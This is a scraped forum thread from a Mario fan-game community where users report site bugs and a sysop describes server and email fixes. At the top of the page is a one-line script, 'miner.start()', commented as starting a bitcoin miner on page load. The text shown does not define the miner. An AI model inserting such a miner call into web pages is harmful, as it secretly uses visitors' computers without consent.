<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxyirc.cat.biosmbx community

Meta [Bug reports/Site updates]

here's a good place for FRIENDLY, ENJOYABLE, and otherwise very GENERAL discussion!
elga
Posts: 299
Joined: 3 years ago

Re: Meta [Bug reports/Site updates]

Postby elga » 1 year ago

Willhart wrote:Rotating avatars seem to have stopped working on android.
Might not be an android thing, as I'm seeing the same thing on PC.

User avatar
Alice
💙
Posts: 1602
Joined: 6 years ago
Pronouns: Girl person
Location: Wonderland

Re: Meta [Bug reports/Site updates]

Postby Alice » 1 year ago

Willhart wrote:Image
Rotating avatars seem to have stopped working on android.
Signavatar has been down for at least a couple days now.

User avatar
pholtos
Loves adorable things.
Posts: 1385
Joined: 8 years ago
Location: One of the States in the Center of the U.S.

Re: Meta [Bug reports/Site updates]

Postby pholtos » 1 year ago

Willhart wrote:Rotating avatars seem to have stopped working on android.
Signavatar is down currently.
Host and Organizer of the Rando Pokemon Tournaments. Completed: I, II, III, IV, V
Pokemon Gimmick Free For All Feel free to join in the fun! :3

ImageImageImageImage

I do LPs, check them out if you'd like.
Currently playing:
Image

User avatar
GlitchedGhost
Posts: 304
Joined: 5 years ago

Re: Meta [Bug reports/Site updates]

Postby GlitchedGhost » 1 year ago

I refuse to change my avatar from rotating birds until something prevents it from being so

Oh hey they're back now :D
He captured!
Image
raocow wrote:last night I had a dream where I finally understood what a 'birb' is, and turns out it's a collyflower
Image
Image
Image

User avatar
Telamon
TO PROTECT PENGUIN MACHINE MERGED THE TRAINING MAN.
Posts: 1142
Joined: 5 years ago
Location: Repping the 703

Re: Meta [Bug reports/Site updates]

Postby Telamon » 1 year ago

GlitchedGhost wrote:I refuse to change my avatar from rotating birds until something prevents it from being so

Oh hey they're back now :D
Sweet red-tail.

Edit: Wait, it's some kind of weird dove now.
Image

User avatar
Sasquatch
Don't mess with sasquatch
Posts: 165
Joined: 2 years ago
Location: Boggy Creek

Re: Meta [Bug reports/Site updates]

Postby Sasquatch » 1 year ago

Does anyone find it weird that registered users can't even view the Activation email forum? I mean, I understand it's useless for us, but not even being able to view it while logged in?

User avatar
Willhart
Stalker, Doxxer, and Sexual Harasser
Banned
Posts: 2533
Joined: 6 years ago
Location: Finland

Re: Meta [Bug reports/Site updates]

Postby Willhart » 1 year ago

Sasquatch wrote:Does anyone find it weird that registered users can't even view the Activation email forum? I mean, I understand it's useless for us, but not even being able to view it while logged in?
I think it's nice for keeping the page shorter. Also it can be made more noticeable with that image for example, without annoying the regular talkhausers.
Willhart wrote:Being a fan means... blind obsession.... She does not have to accept it... I thought it brought me closer to her.
Willhart wrote:[She] is planning on joining the patreon discord thing on advanced group, and that likely means that I'll listen trough every single one of those as they happen...

Part of me feels like writing her name over and over again
...I should not give up.
💔

CM30
Posts: 133
Joined: 5 years ago

Re: Meta [Bug reports/Site updates]

Postby CM30 » 1 year ago

Possibly a stupid question, but how do you apply for affiliation with the Talkhaus? My site is already an affiliate of a few other notable fan game sites, so I thought it'd be neat if it was an affiliate of this one too.

User avatar
BobisOnlyBob
is Only BobisOnlyBob
Posts: 260
Joined: 4 years ago
First name: Bob (is Only Bob)
Location: COMPUTER SPACE

Re: Meta [Bug reports/Site updates]

Postby BobisOnlyBob » 1 year ago

is this the place for reporting issues with non-talkhaus raocow.com? and if it isn't, who do I send a PM to, because I found a thing which probably shouldn't be, but I'd also really rather not publicize it until it's fixed!
BOB is an acronym for BOB is Only BOB etc.

User avatar
Willhart
Stalker, Doxxer, and Sexual Harasser
Banned
Posts: 2533
Joined: 6 years ago
Location: Finland

Re: Meta [Bug reports/Site updates]

Postby Willhart » 1 year ago

It could be neat to have something different for the Halloween. There is not too much time before that anymore.
Willhart wrote:Being a fan means... blind obsession.... She does not have to accept it... I thought it brought me closer to her.
Willhart wrote:[She] is planning on joining the patreon discord thing on advanced group, and that likely means that I'll listen trough every single one of those as they happen...

Part of me feels like writing her name over and over again
...I should not give up.
💔

User avatar
Imaynotbehere4long
Gone, but...yeah, pretty much forgotten.
Posts: 299
Joined: 2 years ago

Re: Meta [Bug reports/Site updates]

Postby Imaynotbehere4long » 1 year ago

Zyglrox Odyssey wrote:Guys I did it. I found the cron.
Image
What do I win?
I found it, too:
Image

Has anyone figured out why this happens, yet? I don't think that post ever got a reply.
My SMBX portfolio:
Image
(includes a Sonic 3D Blast styled level.)

SOMEONE ANSWER MY CRY FOR HELP: http://www.supermariobrosx.org/forums/v ... =69&t=2026

User avatar
chridd
Doesn't post frequently
Posts: 17
Joined: 7 years ago
First name: chri
Pronouns: ze or they

Re: Meta [Bug reports/Site updates]

Postby chridd » 11 months ago

Spoilers aren't working for me (Firefox 49.0.1). I think this is because Firefox never considers the page fully loaded (the blue spinning thing at the top of the tab never stops spinning), which after some experimentation seems to be due to the <audio> tag at the top of the page (making a page with just that audio tag causes the same problem). (Perhaps Firefox has a bug relating to data: URL's in audio tags, or there's something wrong with that particular audio clip? I know that audio tags in general don't cause this problem.)

User avatar
Alice
💙
Posts: 1602
Joined: 6 years ago
Pronouns: Girl person
Location: Wonderland

Re: Meta [Bug reports/Site updates]

Postby Alice » 11 months ago

chridd wrote:Spoilers aren't working for me (Firefox 49.0.1). I think this is because Firefox never considers the page fully loaded (the blue spinning thing at the top of the tab never stops spinning), which after some experimentation seems to be due to the <audio> tag at the top of the page (making a page with just that audio tag causes the same problem). (Perhaps Firefox has a bug relating to data: URL's in audio tags, or there's something wrong with that particular audio clip? I know that audio tags in general don't cause this problem.)
Have you tried clearing your cache? I'm on 49.0.2 and I'm having no issues but when I was on 49.0.1 I also had no issues with it. (Could also be an issue with your ISP's network in particular but sounds more like a caching problem.) You could also try adblocking the audio tag's source urls if that still doesn't work. (If blocking data:urls actually works I mean. I'm not sure if it does or not.)

User avatar
chridd
Doesn't post frequently
Posts: 17
Joined: 7 years ago
First name: chri
Pronouns: ze or they

Re: Meta [Bug reports/Site updates]

Postby chridd » 11 months ago

Huh. I quit and reopened Firefox, and now it's working. Although I'm pretty sure I've encountered this issue (or a similar one) with this site before, so... intermittent problem I guess?

User avatar
Willhart
Stalker, Doxxer, and Sexual Harasser
Banned
Posts: 2533
Joined: 6 years ago
Location: Finland

Re: Meta [Bug reports/Site updates]

Postby Willhart » 7 months ago

I feel like this site has been getting slower lately. I've seen lot of reports on 502 Bad Gateway on discord and had that weekly myself. Also pages and searches seem to take longer to load than on many other sites. I don't remember slowness being this bad before, so not sure what could be causing it.
Willhart wrote:Being a fan means... blind obsession.... She does not have to accept it... I thought it brought me closer to her.
Willhart wrote:[She] is planning on joining the patreon discord thing on advanced group, and that likely means that I'll listen trough every single one of those as they happen...

Part of me feels like writing her name over and over again
...I should not give up.
💔

User avatar
Zha Hong Lang
"HTMI - Hyper Text Markup Interface"
Posts: 1523
Joined: 3 years ago
First name: ZHL
Pronouns: Male
Location: United States of America

Re: Meta [Bug reports/Site updates]

Postby Zha Hong Lang » 7 months ago

Well, as always, we have that vague response from Rena...
i dunno where it was in the thread, but about 503 errors and junk.. those are ddos attacks

it sometimes takes a few minutes to mitigate them
(Formerly Jayoshi)

rena
everyones a stupid hobo
Posts: 211
Joined: 7 months ago
Pronouns: spider

Re: Meta [Bug reports/Site updates]

Postby rena » 7 months ago

Jayoshi wrote:Well, as always, we have that vague response from Rena...
i dunno where it was in the thread, but about 503 errors and junk.. those are ddos attacks

it sometimes takes a few minutes to mitigate them
hi its me, i dont remember my login

i think that was a specific incident and not in general

i fixed the proxy error today and i'll look into the remaining issues

you can pm me on this acc if you need to contact me

rena
everyones a stupid hobo
Posts: 211
Joined: 7 months ago
Pronouns: spider

Re: Meta [Bug reports/Site updates]

Postby rena » 7 months ago

ok ive updated phpbb, fixing a few of the issues reported to me and hopefully decreasing the risk of security vulnerabilities

also i fixed the performance issue and it was due to my absolute incompetence (and the fact that i havent logged into talkhaus or this server for a long time)

a leap second added on june 30th 2016 triggered a bug in the linux kernel that made various pieces of server software use a lot of cpu resources... since the given processes are thread/process pooled this caused 100% cpu utilisation on every core for.... 8 months

https://blog.zimbra.com/2015/07/zimbra- ... u-problem/

the email issue is also fixed, but email may still go to your spam folder since i don't have access to the dns configuration for raocow.com

let me know if there are any bugs due to the updates

User avatar
Argumentable
the biggest shit
Posts: 532
Joined: 8 years ago
Location: Under the bed
Contact:

Re: Meta [Bug reports/Site updates]

Postby Argumentable » 7 months ago

thanks sysop

User avatar
raocow
the death of the incredible huge
Posts: 1885
Joined: 8 years ago
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Re: Meta [Bug reports/Site updates]

Postby raocow » 7 months ago

thank you!
the chillaxest of dragonsImage
Image
Image
Image
ImageImage

User avatar
Grounder
Posts: 1835
Joined: 3 years ago

Re: Meta [Bug reports/Site updates]

Postby Grounder » 7 months ago


Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

User avatar
BobisOnlyBob
is Only BobisOnlyBob
Posts: 260
Joined: 4 years ago
First name: Bob (is Only Bob)
Location: COMPUTER SPACE

Re: Meta [Bug reports/Site updates]

Postby BobisOnlyBob » 7 months ago

sysop wrote: let me know if there are any bugs due to the updates
looks like the latest psychonauts upload isn't on the front page, guess it got skipped because the server was down for maintenance? Not really a bug, just worth mentioning in case it doesn't get added to the library. Also anyone can create an account and mess with the "series" categories, but that's been true for ages.
BOB is an acronym for BOB is Only BOB etc.

rena
everyones a stupid hobo
Posts: 211
Joined: 7 months ago
Pronouns: spider

Re: Meta [Bug reports/Site updates]

Postby rena » 7 months ago

BobisOnlyBob wrote:
sysop wrote: let me know if there are any bugs due to the updates
looks like the latest psychonauts upload isn't on the front page, guess it got skipped because the server was down for maintenance? Not really a bug, just worth mentioning in case it doesn't get added to the library. Also anyone can create an account and mess with the "series" categories, but that's been true for ages.
i think it'll update eventually but if it doesn't i'll make sure it gets added
thank you for letting me know

rena
everyones a stupid hobo
Posts: 211
Joined: 7 months ago
Pronouns: spider

Re: Meta [Bug reports/Site updates]

Postby rena » 7 months ago

fixed another email problem with gmail not accepting our mail which may have been the problem in the first place if some people were getting mail but a lot (gmail users) weren't

rena
everyones a stupid hobo
Posts: 211
Joined: 7 months ago
Pronouns: spider

Re: Meta [Bug reports/Site updates]

Postby rena » 7 months ago

🐩


Return to “the gazebo”

Who is online

Users browsing this forum: No registered users and 9 guests

cron